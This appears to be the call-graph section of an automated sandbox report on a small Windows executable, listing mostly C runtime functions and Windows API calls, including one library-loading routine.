b51b2a 3344->3347 3781 b5367c 3344->3781 3345->3341 3347->3344 3348 b52ae2 __invoke_watson 10 API calls 3347->3348 3348->3347 3350 b514de __IsNonwritableInCurrentImage 3349->3350 3790 b52dc3 3350->3790 3352 b514fc __initterm_e 3354 b5151b __IsNonwritableInCurrentImage __initterm 3352->3354 3794 b52dac 3352->3794 3354->3260 3356 b51035 GetCommandLineW CommandLineToArgvW 3355->3356 3357 b5101f GetLastError 3355->3357 3359 b51056 PathFileExistsW 3356->3359 3360 b51067 3356->3360 3357->3356 3358 b5102c 3357->3358 3358->3264 3359->3360 3361 b5106e PathFileExistsW 3359->3361 3362 b51084 LoadLibraryW 3360->3362 3361->3360 3361->3362 3363 b51091 GetProcAddress 3362->3363 3364 b510aa CloseHandle CoUninitialize 3362->3364 3367 b510a1 3363->3367 3368 b510a3 FreeLibrary 3363->3368 3365 b510c2 3364->3365 3366 b510bb LocalFree 3364->3366 3365->3264 3366->3365 3367->3368 3368->3364 3895 b51555 3369->3895 3371 b51692 3371->3265 3373 b510ee 3372->3373 3374 b510e9 3372->3374 3376 b51719 __NMSG_WRITE 66 API calls 3373->3376 3375 b518c4 __FF_MSGBANNER 66 API calls 3374->3375 3375->3373 3377 b510f6 3376->3377 3378 b51465 _doexit 3 API calls 3377->3378 3379 b51100 3378->3379 3379->3238 3381 b518c4 __FF_MSGBANNER 66 API calls 3380->3381 3382 b5141b 3381->3382 3383 b51719 __NMSG_WRITE 66 API calls 3382->3383 3384 b51423 3383->3384 3385 b520f9 __decode_pointer 6 API calls 3384->3385 3386 b511ad 3385->3386 3386->3246 3388 b51555 _doexit 66 API calls 3387->3388 3389 b516b8 3388->3389 3389->3268 3391 b513ec Sleep GetModuleHandleW 3390->3391 3392 b5140e 3391->3392 3393 b5140a 3391->3393 3392->3274 3393->3391 3393->3392 3460 b520f0 3394->3460 3396 b516d3 __init_pointers __initp_misc_winsig 3463 b52913 3396->3463 3399 b5207e __encode_pointer 6 API calls 3400 b5170f 3399->3400 3401 b5207e TlsGetValue 3400->3401 3402 b520b7 GetModuleHandleW 3401->3402 3403 b52096 3401->3403 3404 b520c7 3402->3404 3405 b520d2 GetProcAddress 3402->3405 3403->3402 3406 b520a0 TlsGetValue 3403->3406 3407 b513e1 __crt_waiting_on_module_handle 2 API calls 3404->3407 3408 b520af 3405->3408 3410 b520ab 3406->3410 3409 b520cd 3407->3409 3408->3289 3409->3405 3409->3408 3410->3402 3410->3408 3412 b5292f 3411->3412 3414 b525a8 3412->3414 3466 b5317c 3412->3466 3414->3276 3415 b520f9 TlsGetValue 3414->3415 3416 b52111 3415->3416 3417 b52132 GetModuleHandleW 3415->3417 3416->3417 3418 b5211b TlsGetValue 3416->3418 3419 b52142 3417->3419 3420 b5214d GetProcAddress 3417->3420 3424 b52126 3418->3424 3421 b513e1 __crt_waiting_on_module_handle 2 API calls 3419->3421 3422 b5212a 3420->3422 3423 b52148 3421->3423 3422->3276 3425 b53730 3422->3425 3423->3420 3423->3422 3424->3417 3424->3422 3428 b53739 3425->3428 3427 b525d5 3427->3276 3427->3301 3428->3427 3429 b53757 Sleep 3428->3429 3471 b5557f 3428->3471 3430 b5376c 3429->3430 3430->3427 3430->3428 3755 b5264c 3431->3755 3433 b521f1 GetModuleHandleW 3434 b52201 3433->3434 3435 b52207 3433->3435 3436 b513e1 __crt_waiting_on_module_handle 2 API calls 3434->3436 3437 b52243 3435->3437 3438 b5221f GetProcAddress GetProcAddress 3435->3438 3436->3435 3439 b52aa0 __lock 62 API calls 3437->3439 3438->3437 3440 b52262 InterlockedIncrement 3439->3440 3756 b522ba 3440->3756 3443 b52aa0 __lock 62 API calls 3444 b52283 3443->3444 3759 b53c9e InterlockedIncrement 3444->3759 3446 b522a1 3771 b522c3 3446->3771 3448 b522ae _doexit 3448->3305 3450 b521b2 3449->3450 3451 b521be 3449->3451 3452 b520f9 __decode_pointer 6 API calls 3450->3452 3453 b521d2 TlsFree 3451->3453 3454 b521e0 3451->3454 3452->3451 3453->3454 3455 b5298b DeleteCriticalSection 3454->3455 3456 b529a3 3454->3456 3457 b535ee ___free_lconv_num 66 API calls 3455->3457 3458 b529b5 DeleteCriticalSection 3456->3458 3459 b529c3 3456->3459 3457->3454 3458->3456 3459->3282 3461 b5207e __encode_pointer 6 API calls 3460->3461 3462 b520f7 3461->3462 3462->3396 3464 b5207e __encode_pointer 6 API calls 3463->3464 3465 b51705 3464->3465 3465->3399 3470 b5264c 3466->3470 3468 b53188 InitializeCriticalSectionAndSpinCount 3469 b531cc _doexit 3468->3469 3469->3412 3470->3468 3472 b5558b _doexit 3471->3472 3473 b555a3 3472->3473 3483 b555c2 ___convertcp 3472->3483 3484 b52c72 3473->3484 3477 b55634 HeapAlloc 3477->3483 3479 b555b8 _doexit 3479->3428 3483->3477 3483->3479 3490 b52aa0 3483->3490 3497 b54dc3 3483->3497 3503 b5567b 3483->3503 3506 b531eb 3483->3506 3509 b522cc GetLastError 3484->3509 3486 b52c77 3487 b52c0a 3486->3487 3488 b520f9 __decode_pointer 6 API calls 3487->3488 3489 b52c1a __invoke_watson 3488->3489 3491 b52ab5 3490->3491 3492 b52ac8 EnterCriticalSection 3490->3492 3551 b529dd 3491->3551 3492->3483 3494 b52abb 3494->3492 3495 b51411 __amsg_exit 65 API calls 3494->3495 3496 b52ac7 3495->3496 3496->3492 3499 b54df1 3497->3499 3498 b54e8a 3501 b54e93 3498->3501 3750 b549da 3498->3750 3499->3498 3499->3501 3743 b5492a 3499->3743 3501->3483 3754 b529c6 LeaveCriticalSection 3503->3754 3505 b55682 3505->3483 3507 b520f9 __decode_pointer 6 API calls 3506->3507 3508 b531fb 3507->3508 3508->3483 3523 b52174 TlsGetValue 3509->3523 3512 b52339 SetLastError 3512->3486 3513 b53730 __calloc_crt 63 API calls 3514 b522f7 3513->3514 3514->3512 3515 b520f9 __decode_pointer 6 API calls 3514->3515 3516 b52311 3515->3516 3517 b52330 3516->3517 3518 b52318 3516->3518 3528 b535ee 3517->3528 3519 b521e5 __getptd_noexit 63 API calls 3518->3519 3521 b52320 GetCurrentThreadId 3519->3521 3521->3512 3522 b52336 3522->3512 3524 b521a4 3523->3524 3525 b52189 3523->3525 3524->3512 3524->3513 3526 b520f9 __decode_pointer 6 API calls 3525->3526 3527 b52194 TlsSetValue 3526->3527 3527->3524 3530 b535fa _doexit 3528->3530 3529 b53639 3531 b53673 _doexit _realloc 3529->3531 3532 b5364e HeapFree 3529->3532 3530->3529 3530->3531 3533 b52aa0 __lock 64 API calls 3530->3533 3531->3522 3532->3531 3534 b53660 3532->3534 3537 b53611 ___sbh_find_block 3533->3537 3535 b52c72 _strcpy_s 64 API calls 3534->3535 3536 b53665 GetLastError 3535->3536 3536->3531 3538 b5362b 3537->3538 3541 b54614 3537->3541 3547 b53644 3538->3547 3542 b54653 3541->3542 3546 b548f5 ___sbh_free_block 3541->3546 3543 b5483f VirtualFree 3542->3543 3542->3546 3544 b548a3 3543->3544 3545 b548b2 VirtualFree HeapFree 3544->3545 3544->3546 3545->3546 3546->3538 3550 b529c6 LeaveCriticalSection 3547->3550 3549 b5364b 3549->3529 3550->3549 3552 b529e9 _doexit 3551->3552 3554 b52a0f 3552->3554 3577 b518c4 3552->3577 3559 b52a1f _doexit 3554->3559 3623 b536eb 3554->3623 3559->3494 3561 b52a31 3565 b52c72 _strcpy_s 66 API calls 3561->3565 3562 b52a40 3563 b52aa0 __lock 66 API calls 3562->3563 3566 b52a47 3563->3566 3565->3559 3567 b52a4f 3566->3567 3568 b52a7b 3566->3568 3569 b5317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3567->3569 3570 b535ee ___free_lconv_num 66 API calls 3568->3570 3571 b52a5a 3569->3571 3572 b52a6c 3570->3572 3571->3572 3574 b535ee ___free_lconv_num 66 API calls 3571->3574 3628 b52a97 3572->3628 3575 b52a66 3574->3575 3576 b52c72 _strcpy_s 66 API calls 3575->3576 3576->3572 3631 b535a3 3577->3631 3580 b535a3 __set_error_mode 66 API calls 3584 b518d8 3580->3584 3581 b51719 __NMSG_WRITE 66 API calls 3582 b518f0 3581->3582 3583 b51719 __NMSG_WRITE 66 API calls 3582->3583 3585 b518fa 3583->3585 3584->3581 3584->3585 3586 b51719 3585->3586 3587 b5172d 3586->3587 3588 b51888 3587->3588 3589 b535a3 __set_error_mode 63 API calls 3587->3589 3620 b51465 3588->3620 3590 b5174f 3589->3590 3591 b5188d GetStdHandle 3590->3591 3593 b535a3 __set_error_mode 63 API calls 3590->3593 3591->3588 3592 b5189b _strlen 3591->3592 3592->3588 3596 b518b4 WriteFile 3592->3596 3594 b51760 3593->3594 3594->3591 3595 b51772 3594->3595 3595->3588 3637 b5353b 3595->3637 3596->3588 3599 b517a8 GetModuleFileNameA 3601 b517c6 3599->3601 3606 b517e9 _strlen 3599->3606 3603 b5353b _strcpy_s 63 API calls 3601->3603 3604 b517d6 3603->3604 3604->3606 3607 b52ae2 __invoke_watson 10 API calls 3604->3607 3605 b5182c 3662 b5337c 3605->3662 3606->3605 3653 b533f0 3606->3653 3607->3606 3612 b51850 3614 b5337c _strcat_s 63 API calls 3612->3614 3613 b52ae2 __invoke_watson 10 API calls 3613->3612 3615 b51864 3614->3615 3617 b51875 3615->3617 3618 b52ae2 __invoke_watson 10 API calls 3615->3618 3616 b52ae2 __invoke_watson 10 API calls 3616->3605 3671 b53213 3617->3671 3618->3617 3709 b5143a GetModuleHandleW 3620->3709 3627 b536f4 3623->3627 3625 b52a2a 3625->3561 3625->3562 3626 b5370b Sleep 3626->3627 3627->3625 3627->3626 3713 b554b5 3627->3713 3742 b529c6 LeaveCriticalSection 3628->3742 3630 b52a9e 3630->3559 3632 b535b2 3631->3632 3633 b518cb 3632->3633 3634 b52c72 _strcpy_s 66 API calls 3632->3634 3633->3580 3633->3584 3635 b535d5 3634->3635 3636 b52c0a _strcpy_s 6 API calls 3635->3636 3636->3633 3638 b53553 3637->3638 3639 b5354c 3637->3639 3640 b52c72 _strcpy_s 66 API calls 3638->3640 3639->3638 3644 b53579 3639->3644 3641 b53558 3640->3641 3642 b52c0a _strcpy_s 6 API calls 3641->3642 3643 b51794 3642->3643 3643->3599 3646 b52ae2 3643->3646 3644->3643 3645 b52c72 _strcpy_s 66 API calls 3644->3645 3645->3641 3698 b55320 3646->3698 3648 b52b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3649 b52beb GetCurrentProcess TerminateProcess 3648->3649 3651 b52bdf __invoke_watson 3648->3651 3700 b510cc 3649->3700 3651->3649 3652 b517a5 3652->3599 3656 b53402 3653->3656 3654 b53406 3655 b52c72 _strcpy_s 66 API calls 3654->3655 3657 b51819 3654->3657 3661 b53422 3655->3661 3656->3654 3656->3657 3659 b5344c 3656->3659 3657->3605 3657->3616 3658 b52c0a _strcpy_s 6 API calls 3658->3657 3659->3657 3660 b52c72 _strcpy_s 66 API calls 3659->3660 3660->3661 3661->3658 3663 b53394 3662->3663 3666 b5338d 3662->3666 3664 b52c72 _strcpy_s 66 API calls 3663->3664 3665 b53399 3664->3665 3667 b52c0a _strcpy_s 6 API calls 3665->3667 3666->3663 3668 b533c8 3666->3668 3669 b5183f 3667->3669 3668->3669 3670 b52c72 _strcpy_s 66 API calls 3668->3670 3669->3612 3669->3613 3670->3665 3672 b520f0 _doexit 6 API calls 3671->3672 3673 b53223 3672->3673 3674 b532be 3673->3674 3675 b53236 LoadLibraryA 3673->3675 3681 b520f9 __decode_pointer 6 API calls 3674->3681 3694 b532e8 3674->3694 3676 b53360 3675->3676 3677 b5324b GetProcAddress 3675->3677 3676->3588 3677->3676 3678 b53261 3677->3678 3682 b5207e __encode_pointer 6 API calls 3678->3682 3679 b53313 3683 b520f9 __decode_pointer 6 API calls 3679->3683 3680 b520f9 __decode_pointer 6 API calls 3691 b5332b 3680->3691 3684 b532db 3681->3684 3685 b53267 GetProcAddress 3682->3685 3683->3676 3686 b520f9 __decode_pointer 6 API calls 3684->3686 3687 b5207e __encode_pointer 6 API calls 3685->3687 3686->3694 3688 b5327c GetProcAddress 3687->3688 3689 b5207e __encode_pointer 6 API calls 3688->3689 3690 b53291 GetProcAddress 3689->3690 3692 b5207e __encode_pointer 6 API calls 3690->3692 3691->3679 3693 b520f9 __decode_pointer 6 API calls 3691->3693 3695 b532a6 3692->3695 3693->3679 3694->3679 3694->3680 3695->3674 3696 b532b0 GetProcAddress 3695->3696 3697 b5207e __encode_pointer 6 API calls 3696->3697 3697->3674 3699 b5532c __VEC_memzero 3698->3699 3699->3648 3701 b510d4 3700->3701 3702 b510d6 IsDebuggerPresent 3700->3702 3701->3652 3708 b528d2 3702->3708 3705 b51358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3706 b51375 __invoke_watson 3705->3706 3707 b5137d GetCurrentProcess TerminateProcess 3705->3707 3706->3707 3707->3652 3708->3705 3710 b51463 ExitProcess 3709->3710 3711 b5144e GetProcAddress 3709->3711 3711->3710 3712 b5145e 3711->3712 3712->3710 3714 b55568 3713->3714 3723 b554c7 3713->3723 3715 b531eb __calloc_impl 6 API calls 3714->3715 3716 b5556e 3715->3716 3718 b52c72 _strcpy_s 65 API calls 3716->3718 3717 b518c4 __FF_MSGBANNER 65 API calls 3717->3723 3729 b55560 3718->3729 3720 b51719 __NMSG_WRITE 65 API calls 3720->3723 3721 b55524 HeapAlloc 3721->3723 3722 b51465 _doexit 3 API calls 3722->3723 3723->3717 3723->3720 3723->3721 3723->3722 3724 b55554 3723->3724 3725 b531eb __calloc_impl 6 API calls 3723->3725 3727 b55559 3723->3727 3723->3729 3730 b55466 3723->3730 3726 b52c72 _strcpy_s 65 API calls 3724->3726 3725->3723 3726->3727 3728 b52c72 _strcpy_s 65 API calls 3727->3728 3728->3729 3729->3627 3731 b55472 _doexit 3730->3731 3732 b52aa0 __lock 66 API calls 3731->3732 3733 b554a3 _doexit 3731->3733 3734 b55488 3732->3734 3733->3723 3735 b54dc3 ___sbh_alloc_block 5 API calls 3734->3735 3736 b55493 3735->3736 3738 b554ac 3736->3738 3741 b529c6 LeaveCriticalSection 3738->3741 3740 b554b3 3740->3733 3741->3740 3742->3630 3744 b54971 HeapAlloc 3743->3744 3745 b5493d HeapReAlloc 3743->3745 3747 b5495b 3744->3747 3748 b54994 VirtualAlloc 3744->3748 3746 b5495f 3745->3746 3745->3747 3746->3744 3747->3498 3748->3747 3749 b549ae HeapFree 3748->3749 3749->3747 3751 b549f1 VirtualAlloc 3750->3751 3753 b54a38 3751->3753 3753->3501 3754->3505 3755->3433 3774 b529c6 LeaveCriticalSection 3756->3774 3758 b5227c 3758->3443 3760 b53cbc InterlockedIncrement 3759->3760 3761 b53cbf 3759->3761 3760->3761 3762 b53ccc 3761->3762 3763 b53cc9 InterlockedIncrement 3761->3763 3764 b53cd6 InterlockedIncrement 3762->3764 3765 b53cd9 3762->3765 3763->3762 3764->3765 3766 b53ce6 3765->3766 3767 b53ce3 InterlockedIncrement 3765->3767 3768 b53cff InterlockedIncrement 3766->3768 3769 b53d0f InterlockedIncrement 3766->3769 3770 b53d1a InterlockedIncrement 3766->3770 3767->3766 3768->3766 3769->3766 3770->3446 3775 b529c6 LeaveCriticalSection 3771->3775 3773 b522ca 3773->3448 3774->3758 3775->3773 3776->3308 3778 b53808 3777->3778 3779 b5382f __VEC_memcpy 3778->3779 3780 b51dd3 3778->3780 3779->3780 3780->3327 3782 b53694 3781->3782 3783 b5368d 3781->3783 3784 b52c72 _strcpy_s 66 API calls 3782->3784 3783->3782 3788 b536c0 3783->3788 3785 b53699 3784->3785 3786 b52c0a _strcpy_s 6 API calls 3785->3786 3787 b536a8 3786->3787 3787->3344 3788->3787 3789 b52c72 _strcpy_s 66 API calls 3788->3789 3789->3785 3791 b52dc9 3790->3791 3792 b5207e __encode_pointer 6 API calls 3791->3792 3793 b52de1 3791->3793 3792->3791 3793->3352 3797 b52d70 3794->3797 3796 b52db9 3796->3354 3798 b52d7c _doexit 3797->3798 3805 b5147d 3798->3805 3804 b52d9d _doexit 3804->3796 3806 b52aa0 __lock 66 API calls 3805->3806 3807 b51484 3806->3807 3808 b52c85 3807->3808 3809 b520f9 __decode_pointer 6 API calls 3808->3809 3810 b52c99 3809->3810 3811 b520f9 __decode_pointer 6 API calls 3810->3811 3812 b52ca9 3811->3812 3813 b52d2c 3812->3813 3828 b5539a 3812->3828 3825 b52da6 3813->3825 3815 b5207e __encode_pointer 6 API calls 3818 b52d21 3815->3818 3816 b52ceb 3816->3813 3821 b5377c __realloc_crt 73 API calls 3816->3821 3822 b52d01 3816->3822 3817 b52cc7 3817->3816 3824 b52d13 3817->3824 3841 b5377c 3817->3841 3820 b5207e __encode_pointer 6 API calls 3818->3820 3820->3813 3821->3822 3822->3813 3823 b5207e __encode_pointer 6 API calls 3822->3823 3823->3824 3824->3815 3891 b51486 3825->3891 3829 b553a6 _doexit 3828->3829 3830 b553b6 3829->3830 3831 b553d3 3829->3831 3832 b52c72 _strcpy_s 66 API calls 3830->3832 3833 b55414 HeapSize 3831->3833 3835 b52aa0 __lock 66 API calls 3831->3835 3834 b553bb 3832->3834 3837 b553cb _doexit 3833->3837 3836 b52c0a _strcpy_s 6 API calls 3834->3836 3838 b553e3 ___sbh_find_block 3835->3838 3836->3837 3837->3817 3846 b55434 3838->3846 3842 b53785 3841->3842 3844 b537c4 3842->3844 3845 b537a5 Sleep 3842->3845 3850 b5569d 3842->3850 3844->3816 3845->3842 3849 b529c6 LeaveCriticalSection 3846->3849 3848 b5540f 3848->3833 3848->3837 3849->3848 3851 b556a9 _doexit 3850->3851 3852 b556b0 3851->3852 3853 b556be 3851->3853 3854 b554b5 _malloc 66 API calls 3852->3854 3855 b556c5 3853->3855 3856 b556d1 3853->3856 3876 b556b8 _doexit _realloc 3854->3876 3857 b535ee ___free_lconv_num 66 API calls 3855->3857 3863 b55843 3856->3863 3874 b556de ___sbh_resize_block ___sbh_find_block 3856->3874 3857->3876 3858 b55876 3859 b531eb __calloc_impl 6 API calls 3858->3859 3862 b5587c 3859->3862 3860 b52aa0 __lock 66 API calls 3860->3874 3861 b55848 HeapReAlloc 3861->3863 3861->3876 3864 b52c72 _strcpy_s 66 API calls 3862->3864 3863->3858 3863->3861 3865 b5589a 3863->3865 3866 b531eb __calloc_impl 6 API calls 3863->3866 3869 b55890 3863->3869 3864->3876 3867 b52c72 _strcpy_s 66 API calls 3865->3867 3865->3876 3866->3863 3870 b558a3 GetLastError 3867->3870 3871 b52c72 _strcpy_s 66 API calls 3869->3871 3870->3876 3885 b55811 3871->3885 3872 b55769 HeapAlloc 3872->3874 3873 b557be HeapReAlloc 3873->3874 3874->3858 3874->3860 3874->3872 3874->3873 3874->3876 3877 b54dc3 ___sbh_alloc_block 5 API calls 3874->3877 3878 b55829 3874->3878 3879 b531eb __calloc_impl 6 API calls 3874->3879 3881 b537f0 __VEC_memcpy _realloc 3874->3881 3883 b5580c 3874->3883 3886 b54614 VirtualFree VirtualFree HeapFree ___sbh_free_block 3874->3886 3887 b557e1 3874->3887 3875 b55816 GetLastError 3875->3876 3876->3842 3877->3874 3878->3876 3880 b52c72 _strcpy_s 66 API calls 3878->3880 3879->3874 3882 b55836 3880->3882 3881->3874 3882->3870 3882->3876 3884 b52c72 _strcpy_s 66 API calls 3883->3884 3884->3885 3885->3875 3885->3876 3886->3874 3890 b529c6 LeaveCriticalSection 3887->3890 3889 b557e8 3889->3874 3890->3889 3894 b529c6 LeaveCriticalSection 3891->3894 3893 b5148d 3893->3804 3894->3893 3896 b51561 _doexit 3895->3896 3897 b52aa0 __lock 66 API calls 3896->3897 3898 b51568 3897->3898 3899 b51631 __initterm 3898->3899 3901 b51594 3898->3901 3914 b5166c 3899->3914 3903 b520f9 __decode_pointer 6 API calls 3901->3903 3904 b5159f 3903->3904 3907 b520f9 __decode_pointer 6 API calls 3904->3907 3910 b51621 __initterm 3904->3910 3906 b51660 3909 b51465 _doexit 3 API calls 3906->3909 3912 b515b4 3907->3912 3908 b51669 _doexit 3908->3371 3909->3908 3910->3899 3911 b520f0 6 API calls _doexit 3911->3912 3912->3910 3912->3911 3913 b520f9 6 API calls __decode_pointer 3912->3913 3913->3912 3915 b51672 3914->3915 3916 b5164d 3914->3916 3919 b529c6 LeaveCriticalSection 3915->3919 3916->3908 3918 b529c6 LeaveCriticalSection 3916->3918 3918->3906 3919->3916 4236 b54247 4246 b541cb 4236->4246 4239 b54272 setSBCS 4240 b510cc ___convertcp 5 API calls 4239->4240 4241 b5442a 4240->4241 4242 b542b6 IsValidCodePage 4242->4239 4243 b542c8 GetCPInfo 4242->4243 4243->4239 4244 b542db ___convertcp __setmbcp_nolock 4243->4244 4253 b53f0d GetCPInfo 4244->4253 4263 b54144 4246->4263 4249 b54208 4251 b5420d GetACP 4249->4251 4252 b541fa 4249->4252 4250 b541ea GetOEMCP 4250->4252 4251->4252 4252->4239 4252->4242 4252->4244 4258 b53f41 ___convertcp 4253->4258 4262 b53ff3 4253->4262 4257 b510cc ___convertcp 5 API calls 4260 b5409e 4257->4260 4318 b55fe2 4258->4318 4260->4244 4261 b56415 ___crtLCMapStringA 101 API calls 4261->4262 4262->4257 4264 b54157 4263->4264 4270 b541a4 4263->4270 4265 b52345 __getptd 66 API calls 4264->4265 4266 b5415c 4265->4266 4267 b54184 4266->4267 4271 b53e04 4266->4271 4267->4270 4286 b540a0 4267->4286 4270->4249 4270->4250 4272 b53e10 _doexit 4271->4272 4273 b52345 __getptd 66 API calls 4272->4273 4274 b53e15 4273->4274 4275 b53e43 4274->4275 4276 b53e27 4274->4276 4277 b52aa0 __lock 66 API calls 4275->4277 4278 b52345 __getptd 66 API calls 4276->4278 4279 b53e4a 4277->4279 4281 b53e2c 4278->4281 4302 b53dc6 4279->4302 4284 b53e3a _doexit 4281->4284 4285 b51411 __amsg_exit 66 API calls 4281->4285 4284->4267 4285->4284 4287 b540ac _doexit 4286->4287 4288 b52345 __getptd 66 API calls 4287->4288 4289 b540b1 4288->4289 4290 b540c3 4289->4290 4291 b52aa0 __lock 66 API calls 4289->4291 4294 b540d1 _doexit 4290->4294 4298 b51411 __amsg_exit 66 API calls 4290->4298 4292 b540e1 4291->4292 4293 b5412a 4292->4293 4295 b54112 InterlockedIncrement 4292->4295 4296 b540f8 InterlockedDecrement 4292->4296 4314 b5413b 4293->4314 4294->4270 4295->4293 4296->4295 4299 b54103 4296->4299 4298->4294 4299->4295 4300 b535ee ___free_lconv_num 66 API calls 4299->4300 4301 b54111 4300->4301 4301->4295 4303 b53dca 4302->4303 4309 b53dfc 4302->4309 4304 b53c9e ___addlocaleref 8 API calls 4303->4304 4303->4309 4305 b53ddd 4304->4305 4306 b53d2d ___removelocaleref 8 API calls 4305->4306 4305->4309 4307 b53de8 4306->4307 4308 b53b55 ___freetlocinfo 66 API calls 4307->4308 4307->4309 4308->4309 4310 b53e6e 4309->4310 4313 b529c6 LeaveCriticalSection 4310->4313 4312 b53e75 4312->4281 4313->4312 4317 b529c6 LeaveCriticalSection 4314->4317 4316 b54142 4316->4290 4317->4316 4319 b54144 _LocaleUpdate::_LocaleUpdate 76 API calls 4318->4319 4320 b55ff5 4319->4320 4328 b55e28 4320->4328 4323 b56415 4324 b54144 _LocaleUpdate::_LocaleUpdate 76 API calls 4323->4324 4325 b56428 4324->4325 4416 b56070 4325->4416 4329 b55e74 4328->4329 4330 b55e49 GetStringTypeW 4328->4330 4331 b55e61 4329->4331 4333 b55f5b 4329->4333 4330->4331 4332 b55e69 GetLastError 4330->4332 4334 b55ead MultiByteToWideChar 4331->4334 4351 b55f55 4331->4351 4332->4329 4356 b56b1a GetLocaleInfoA 4333->4356 4339 b55eda 4334->4339 4334->4351 4336 b510cc ___convertcp 5 API calls 4338 b53fae 4336->4338 4338->4323 4340 b55eef ___convertcp __alloca_probe_16 4339->4340 4343 b554b5 _malloc 66 API calls 4339->4343 4345 b55f28 MultiByteToWideChar 4340->4345 4340->4351 4341 b55fac GetStringTypeA 4342 b55fc7 4341->4342 4341->4351 4348 b535ee ___free_lconv_num 66 API calls 4342->4348 4343->4340 4346 b55f4f 4345->4346 4347 b55f3e GetStringTypeW 4345->4347 4352 b55446 4346->4352 4347->4346 4348->4351 4351->4336 4353 b55452 4352->4353 4355 b55463 4352->4355 4354 b535ee ___free_lconv_num 66 API calls 4353->4354 4353->4355 4354->4355 4355->4351 4357 b56b4d 4356->4357 4358 b56b48 4356->4358 4387 b56b04 4357->4387 4360 b510cc ___convertcp 5 API calls 4358->4360 4361 b55f7f 4360->4361 4361->4341 4361->4351 4362 b56b63 4361->4362 4363 b56ba3 GetCPInfo 4362->4363 4367 b56c2d 4362->4367 4364 b56c18 MultiByteToWideChar 4363->4364 4365 b56bba 4363->4365 4364->4367 4371 b56bd3 _strlen 4364->4371 4365->4364 4368 b56bc0 GetCPInfo 4365->4368 4366 b510cc ___convertcp 5 API calls 4369 b55fa0 4366->4369 4367->4366 4368->4364 4370 b56bcd 4368->4370 4369->4341 4369->4351 4370->4364 4370->4371 4372 b554b5 _malloc 66 API calls 4371->4372 4376 b56c05 ___convertcp __alloca_probe_16 4371->4376 4372->4376 4373 b56c62 MultiByteToWideChar 4374 b56c99 4373->4374 4375 b56c7a 4373->4375 4379 b55446 __freea 66 API calls 4374->4379 4377 b56c81 WideCharToMultiByte 4375->4377 4378 b56c9e 4375->4378 4376->4367 4376->4373 4377->4374 4380 b56cbd 4378->4380 4381 b56ca9 WideCharToMultiByte 4378->4381 4379->4367 4382 b53730 __calloc_crt 66 API calls 4380->4382 4381->4374 4381->4380 4383 b56cc5 4382->4383 4383->4374 4384 b56cce WideCharToMultiByte 4383->4384 4384->4374 4385 b56ce0 4384->4385 4386 b535ee ___free_lconv_num 66 API calls 4385->4386 4386->4374 4390 b56f7a 4387->4390 4391 b56f93 4390->4391 4394 b56d4b 4391->4394 4395 b54144 _LocaleUpdate::_LocaleUpdate 76 API calls 4394->4395 4398 b56d60 4395->4398 4396 b56d72 4397 b52c72 _strcpy_s 66 API calls 4396->4397 4399 b56d77 4397->4399 4398->4396 4401 b56daf 4398->4401 4400 b52c0a _strcpy_s 6 API calls 4399->4400 4403 b56b15 4400->4403 4404 b56df4 4401->4404 4406 b569e5 4401->4406 4403->4358 4404->4403 4405 b52c72 _strcpy_s 66 API calls 4404->4405 4405->4403 4407 b54144 _LocaleUpdate::_LocaleUpdate 76 API calls 4406->4407 4408 b569f9 4407->4408 4412 b56a06 4408->4412 4413 b56acc 4408->4413 4411 b55fe2 ___crtGetStringTypeA 90 API calls 4411->4412 4412->4401 4414 b54144 _LocaleUpdate::_LocaleUpdate 76 API calls 4413->4414 4415 b56a2e 4414->4415 4415->4411 4417 b56091 LCMapStringW 4416->4417 4421 b560ac 4416->4421 4418 b560b4 GetLastError 4417->4418 4417->4421 4418->4421 4419 b562aa 4423 b56b1a ___ansicp 90 API calls 4419->4423 4420 b56106 4422 b5611f MultiByteToWideChar 4420->4422 4444 b562a1 4420->4444 4421->4419 4421->4420 4430 b5614c 4422->4430 4422->4444 4425 b562d2 4423->4425 4424 b510cc ___convertcp 5 API calls 4426 b53fce 4424->4426 4427 b563c6 LCMapStringA 4425->4427 4428 b562eb 4425->4428 4425->4444 4426->4261 4462 b56322 4427->4462 4431 b56b63 ___convertcp 73 API calls 4428->4431 4429 b5619d MultiByteToWideChar 4432 b561b6 LCMapStringW 4429->4432 4433 b56298 4429->4433 4435 b554b5 _malloc 66 API calls 4430->4435 4442 b56165 __alloca_probe_16 4430->4442 4436 b562fd 4431->4436 4432->4433 4438 b561d7 4432->4438 4437 b55446 __freea 66 API calls 4433->4437 4434 b563ed 4443 b535ee ___free_lconv_num 66 API calls 4434->4443 4434->4444 4435->4442 4440 b56307 LCMapStringA 4436->4440 4436->4444 4437->4444 4441 b561e0 4438->4441 4449 b56209 4438->4449 4439 b535ee ___free_lconv_num 66 API calls 4439->4434 4446 b56329 4440->4446 4440->4462 4441->4433 4445 b561f2 LCMapStringW 4441->4445 4442->4429 4442->4444 4443->4444 4444->4424 4445->4433 4451 b5633a ___convertcp __alloca_probe_16 4446->4451 4452 b554b5 _malloc 66 API calls 4446->4452 4447 b56258 LCMapStringW 4453 b56270 WideCharToMultiByte 4447->4453 4454 b56292 4447->4454 4448 b56224 __alloca_probe_16 4448->4433 4448->4447 4449->4448 4450 b554b5 _malloc 66 API calls 4449->4450 4450->4448 4455 b56378 LCMapStringA 4451->4455 4451->4462 4452->4451 4453->4454 4456 b55446 __freea 66 API calls 4454->4456 4457 b56398 4455->4457 4459 b56394 4455->4459 4456->4433 4460 b56b63 ___convertcp 73 API calls 4457->4460 4461 b55446 __freea 66 API calls 4459->4461 4460->4459 4461->4462 4462->4434 4462->4439 4017 b51281 4020 b5283c 4017->4020 4019 b51286 4019->4019 4021 b52861 4020->4021 4022 b5286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 4020->4022 4021->4022 4023 b52865 4021->4023 4022->4023 4023->4019 4463 b51242 4464 b51257 4463->4464 4465 b51251 4463->4465 4469 b516bc 4464->4469 4467 b51697 _abort 66 API calls 4465->4467 4467->4464 4468 b5125c _doexit 4470 b51555 _doexit 66 API calls 4469->4470 4471 b516c7 4470->4471 4471->4468 4024 b5458d 4027 b529c6 LeaveCriticalSection 4024->4027 4026 b54594 4027->4026 3952 b5122e 3955 b518fe 3952->3955 3956 b522cc __getptd_noexit 66 API calls 3955->3956 3957 b5123f 3956->3957 4472 b567c8 RtlUnwind

                                                                              Executed Functions

                                                                              Function 00B51000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73libraryloadersynchronizationCOMMON
                                                                              Download Yara Rule

